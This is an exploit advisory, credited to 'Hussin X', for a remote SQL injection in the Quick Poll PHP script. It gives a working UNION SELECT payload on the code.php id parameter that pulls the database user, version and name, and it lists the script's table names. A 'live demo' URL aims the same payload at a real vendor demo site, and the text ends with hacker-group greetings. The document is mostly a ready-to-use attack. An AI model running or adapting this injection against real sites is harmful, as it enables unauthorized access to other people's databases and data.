|___________________________________________________|
|
| Quick Poll (code.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script :http://discountedscripts.com/product_info.php?products_id=69
|
|___________________________________________________|

Exploit:  
________


Admin Name :

www.[target].com/Script/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--


______________________

table_name : column_name

answers : poll
codes : poll
comments : poll
voted : poll


______________________





L!VE DEMO:
_________


http://www.discountedscripts.com/demos/newpoll/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--



____________________________( Greetz )____________________________
|
|  tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
|   
|  jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke
|_________________________________________________________________


                       Im IRAQi